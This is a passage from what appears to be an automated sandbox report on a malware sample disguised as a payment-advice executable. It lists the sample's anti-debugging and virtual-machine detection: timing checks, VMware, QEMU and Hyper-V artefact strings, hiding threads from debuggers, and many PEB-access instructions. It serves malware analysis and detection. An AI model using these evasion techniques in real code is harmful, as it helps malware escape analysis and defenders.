Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000002DD85E4 second address: 0000000002DD85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\ipconfig.exe	RDTSC instruction interceptor: First address: 0000000002DD896E second address: 0000000002DD8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe

Code function: 10_2_1E3D6A60 rdtscp

10_2_1E3D6A60

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: explorer.exe, 00000010.00000000.470141246.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000010.00000000.470141246.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: payment advice_mt103645367.exe, 00000000.00000002.374597434.00000000006EA000.00000004.00000020.sdmp	Binary or memory string: 0 Files\Qemu-ga\qemu-ga.exe_
Source: explorer.exe, 00000010.00000000.469722676.0000000008640000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000000.469206322.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000010.00000000.470141246.000000000871F000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000010.00000000.470141246.000000000871F000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000010.00000002.509233796.0000000005603000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000010.00000000.469206322.0000000008220000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: payment advice_mt103645367.exe	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: explorer.exe, 00000010.00000000.469206322.0000000008220000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000010.00000000.469206322.0000000008220000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe

Code function: 10_2_1E3D6A60 rdtscp

10_2_1E3D6A60

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe

Code function: 10_2_1E3E9A20 NtResumeThread,LdrInitializeThunk,

10_2_1E3E9A20

Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]	10_2_1E3E4A2C
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E4A2C mov eax, dword ptr fs:[00000030h]	10_2_1E3E4A2C
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E434257 mov eax, dword ptr fs:[00000030h]	10_2_1E434257
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AE620 mov eax, dword ptr fs:[00000030h]	10_2_1E3AE620
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3C3A1C mov eax, dword ptr fs:[00000030h]	10_2_1E3C3A1C
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DA61C mov eax, dword ptr fs:[00000030h]	10_2_1E3DA61C
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DA61C mov eax, dword ptr fs:[00000030h]	10_2_1E3DA61C
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E45B260 mov eax, dword ptr fs:[00000030h]	10_2_1E45B260
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E45B260 mov eax, dword ptr fs:[00000030h]	10_2_1E45B260
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E478A62 mov eax, dword ptr fs:[00000030h]	10_2_1E478A62
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A5210 mov eax, dword ptr fs:[00000030h]	10_2_1E3A5210
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A5210 mov ecx, dword ptr fs:[00000030h]	10_2_1E3A5210
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A5210 mov eax, dword ptr fs:[00000030h]	10_2_1E3A5210
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A5210 mov eax, dword ptr fs:[00000030h]	10_2_1E3A5210
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]	10_2_1E3AAA16
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AAA16 mov eax, dword ptr fs:[00000030h]	10_2_1E3AAA16
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B8A0A mov eax, dword ptr fs:[00000030h]	10_2_1E3B8A0A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AC600 mov eax, dword ptr fs:[00000030h]	10_2_1E3AC600
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AC600 mov eax, dword ptr fs:[00000030h]	10_2_1E3AC600
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AC600 mov eax, dword ptr fs:[00000030h]	10_2_1E3AC600
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D8E00 mov eax, dword ptr fs:[00000030h]	10_2_1E3D8E00
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E927A mov eax, dword ptr fs:[00000030h]	10_2_1E3E927A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461608 mov eax, dword ptr fs:[00000030h]	10_2_1E461608
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]	10_2_1E3CAE73
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]	10_2_1E3CAE73
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]	10_2_1E3CAE73
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]	10_2_1E3CAE73
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3CAE73 mov eax, dword ptr fs:[00000030h]	10_2_1E3CAE73
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B766D mov eax, dword ptr fs:[00000030h]	10_2_1E3B766D
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A9240 mov eax, dword ptr fs:[00000030h]	10_2_1E3A9240
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A9240 mov eax, dword ptr fs:[00000030h]	10_2_1E3A9240
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A9240 mov eax, dword ptr fs:[00000030h]	10_2_1E3A9240
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A9240 mov eax, dword ptr fs:[00000030h]	10_2_1E3A9240
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E45FE3F mov eax, dword ptr fs:[00000030h]	10_2_1E45FE3F
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]	10_2_1E3B7E41
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]	10_2_1E3B7E41
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]	10_2_1E3B7E41
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]	10_2_1E3B7E41
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]	10_2_1E3B7E41
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B7E41 mov eax, dword ptr fs:[00000030h]	10_2_1E3B7E41
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E45FEC0 mov eax, dword ptr fs:[00000030h]	10_2_1E45FEC0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]	10_2_1E3BAAB0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3BAAB0 mov eax, dword ptr fs:[00000030h]	10_2_1E3BAAB0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DFAB0 mov eax, dword ptr fs:[00000030h]	10_2_1E3DFAB0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E478ED6 mov eax, dword ptr fs:[00000030h]	10_2_1E478ED6
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]	10_2_1E3A52A5
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]	10_2_1E3A52A5
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]	10_2_1E3A52A5
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]	10_2_1E3A52A5
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A52A5 mov eax, dword ptr fs:[00000030h]	10_2_1E3A52A5
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DD294 mov eax, dword ptr fs:[00000030h]	10_2_1E3DD294
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DD294 mov eax, dword ptr fs:[00000030h]	10_2_1E3DD294
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E43FE87 mov eax, dword ptr fs:[00000030h]	10_2_1E43FE87
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B76E2 mov eax, dword ptr fs:[00000030h]	10_2_1E3B76E2
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D2AE4 mov eax, dword ptr fs:[00000030h]	10_2_1E3D2AE4
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D16E0 mov ecx, dword ptr fs:[00000030h]	10_2_1E3D16E0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E470EA5 mov eax, dword ptr fs:[00000030h]	10_2_1E470EA5
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E470EA5 mov eax, dword ptr fs:[00000030h]	10_2_1E470EA5
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E470EA5 mov eax, dword ptr fs:[00000030h]	10_2_1E470EA5
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4246A7 mov eax, dword ptr fs:[00000030h]	10_2_1E4246A7
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D36CC mov eax, dword ptr fs:[00000030h]	10_2_1E3D36CC
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D2ACB mov eax, dword ptr fs:[00000030h]	10_2_1E3D2ACB
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E8EC7 mov eax, dword ptr fs:[00000030h]	10_2_1E3E8EC7
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DE730 mov eax, dword ptr fs:[00000030h]	10_2_1E3DE730
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]	10_2_1E3A4F2E
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3A4F2E mov eax, dword ptr fs:[00000030h]	10_2_1E3A4F2E
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E478B58 mov eax, dword ptr fs:[00000030h]	10_2_1E478B58
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3CF716 mov eax, dword ptr fs:[00000030h]	10_2_1E3CF716
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E478F6A mov eax, dword ptr fs:[00000030h]	10_2_1E478F6A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DA70E mov eax, dword ptr fs:[00000030h]	10_2_1E3DA70E
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DA70E mov eax, dword ptr fs:[00000030h]	10_2_1E3DA70E
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]	10_2_1E3D3B7A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D3B7A mov eax, dword ptr fs:[00000030h]	10_2_1E3D3B7A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E47070D mov eax, dword ptr fs:[00000030h]	10_2_1E47070D
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E47070D mov eax, dword ptr fs:[00000030h]	10_2_1E47070D
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E43FF10 mov eax, dword ptr fs:[00000030h]	10_2_1E43FF10
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E43FF10 mov eax, dword ptr fs:[00000030h]	10_2_1E43FF10
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3ADB60 mov ecx, dword ptr fs:[00000030h]	10_2_1E3ADB60
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3BFF60 mov eax, dword ptr fs:[00000030h]	10_2_1E3BFF60
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E46131B mov eax, dword ptr fs:[00000030h]	10_2_1E46131B
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3AF358 mov eax, dword ptr fs:[00000030h]	10_2_1E3AF358
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3ADB40 mov eax, dword ptr fs:[00000030h]	10_2_1E3ADB40
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3BEF40 mov eax, dword ptr fs:[00000030h]	10_2_1E3BEF40
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4253CA mov eax, dword ptr fs:[00000030h]	10_2_1E4253CA
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E4253CA mov eax, dword ptr fs:[00000030h]	10_2_1E4253CA
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]	10_2_1E3D4BAD
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]	10_2_1E3D4BAD
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D4BAD mov eax, dword ptr fs:[00000030h]	10_2_1E3D4BAD
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D2397 mov eax, dword ptr fs:[00000030h]	10_2_1E3D2397
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DB390 mov eax, dword ptr fs:[00000030h]	10_2_1E3DB390
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B8794 mov eax, dword ptr fs:[00000030h]	10_2_1E3B8794
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]	10_2_1E3B1B8F
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3B1B8F mov eax, dword ptr fs:[00000030h]	10_2_1E3B1B8F
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E45D380 mov ecx, dword ptr fs:[00000030h]	10_2_1E45D380
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E37F5 mov eax, dword ptr fs:[00000030h]	10_2_1E3E37F5
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E46138A mov eax, dword ptr fs:[00000030h]	10_2_1E46138A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3CDBE9 mov eax, dword ptr fs:[00000030h]	10_2_1E3CDBE9
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E427794 mov eax, dword ptr fs:[00000030h]	10_2_1E427794
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E427794 mov eax, dword ptr fs:[00000030h]	10_2_1E427794
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E427794 mov eax, dword ptr fs:[00000030h]	10_2_1E427794
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]	10_2_1E3D03E2
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]	10_2_1E3D03E2
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]	10_2_1E3D03E2
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]	10_2_1E3D03E2
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]	10_2_1E3D03E2
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D03E2 mov eax, dword ptr fs:[00000030h]	10_2_1E3D03E2
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E475BA5 mov eax, dword ptr fs:[00000030h]	10_2_1E475BA5
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D002D mov eax, dword ptr fs:[00000030h]	10_2_1E3D002D
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D002D mov eax, dword ptr fs:[00000030h]	10_2_1E3D002D
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D002D mov eax, dword ptr fs:[00000030h]	10_2_1E3D002D
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D002D mov eax, dword ptr fs:[00000030h]	10_2_1E3D002D
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D002D mov eax, dword ptr fs:[00000030h]	10_2_1E3D002D
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3BB02A mov eax, dword ptr fs:[00000030h]	10_2_1E3BB02A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3BB02A mov eax, dword ptr fs:[00000030h]	10_2_1E3BB02A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3BB02A mov eax, dword ptr fs:[00000030h]	10_2_1E3BB02A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3BB02A mov eax, dword ptr fs:[00000030h]	10_2_1E3BB02A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DBC2C mov eax, dword ptr fs:[00000030h]	10_2_1E3DBC2C
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E43C450 mov eax, dword ptr fs:[00000030h]	10_2_1E43C450
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E43C450 mov eax, dword ptr fs:[00000030h]	10_2_1E43C450
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E471074 mov eax, dword ptr fs:[00000030h]	10_2_1E471074
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E462073 mov eax, dword ptr fs:[00000030h]	10_2_1E462073
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E461C06 mov eax, dword ptr fs:[00000030h]	10_2_1E461C06
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E426C0A mov eax, dword ptr fs:[00000030h]	10_2_1E426C0A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E426C0A mov eax, dword ptr fs:[00000030h]	10_2_1E426C0A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E426C0A mov eax, dword ptr fs:[00000030h]	10_2_1E426C0A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E426C0A mov eax, dword ptr fs:[00000030h]	10_2_1E426C0A
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E47740D mov eax, dword ptr fs:[00000030h]	10_2_1E47740D
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E47740D mov eax, dword ptr fs:[00000030h]	10_2_1E47740D
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E47740D mov eax, dword ptr fs:[00000030h]	10_2_1E47740D
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3C746D mov eax, dword ptr fs:[00000030h]	10_2_1E3C746D
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E474015 mov eax, dword ptr fs:[00000030h]	10_2_1E474015
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E474015 mov eax, dword ptr fs:[00000030h]	10_2_1E474015
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E427016 mov eax, dword ptr fs:[00000030h]	10_2_1E427016
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E427016 mov eax, dword ptr fs:[00000030h]	10_2_1E427016
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E427016 mov eax, dword ptr fs:[00000030h]	10_2_1E427016
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3C0050 mov eax, dword ptr fs:[00000030h]	10_2_1E3C0050
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3C0050 mov eax, dword ptr fs:[00000030h]	10_2_1E3C0050
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DA44B mov eax, dword ptr fs:[00000030h]	10_2_1E3DA44B
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DF0BF mov ecx, dword ptr fs:[00000030h]	10_2_1E3DF0BF
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]	10_2_1E3DF0BF
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3DF0BF mov eax, dword ptr fs:[00000030h]	10_2_1E3DF0BF
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E478CD6 mov eax, dword ptr fs:[00000030h]	10_2_1E478CD6
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3E90AF mov eax, dword ptr fs:[00000030h]	10_2_1E3E90AF
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]	10_2_1E43B8D0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E43B8D0 mov ecx, dword ptr fs:[00000030h]	10_2_1E43B8D0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]	10_2_1E43B8D0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]	10_2_1E43B8D0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]	10_2_1E43B8D0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E43B8D0 mov eax, dword ptr fs:[00000030h]	10_2_1E43B8D0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]	10_2_1E3D20A0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]	10_2_1E3D20A0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]	10_2_1E3D20A0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]	10_2_1E3D20A0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]	10_2_1E3D20A0
Source: C:\Users\user\Desktop\payment advice_mt103645367.exe	Code function: 10_2_1E3D20A0 mov eax, dword ptr fs:[00000030h]	10_2_1E3D20A0
